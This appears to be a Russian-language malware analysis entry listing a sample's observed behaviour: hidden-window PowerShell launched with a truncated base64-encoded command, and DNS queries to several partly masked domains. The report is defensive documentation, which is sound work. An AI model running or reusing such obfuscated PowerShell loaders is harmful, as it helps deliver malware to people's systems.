Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADgAMwAwADIAMAA5ADMAOABiADAAMQA9ACcAeAA4ADEAMQAxADAAMAB4ADIANgAyADUAJwA7ACQAYgAxADMAMQAzADQAMAA...
- DNS ASK su####vithomes.com
- DNS ASK sp#####igitalinc.com
- DNS ASK po####-pieknieje.eu
- DNS ASK tn###shlist.ca
- DNS ASK ai##ah.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADgAMwAwADIAMAA5ADMAOABiADAAMQA9ACcAeAA4ADEAMQAxADAAMAB4ADIANgAyADUAJwA7ACQAYgAxADMAMQAzADQAMAA...' (со скрытым окном)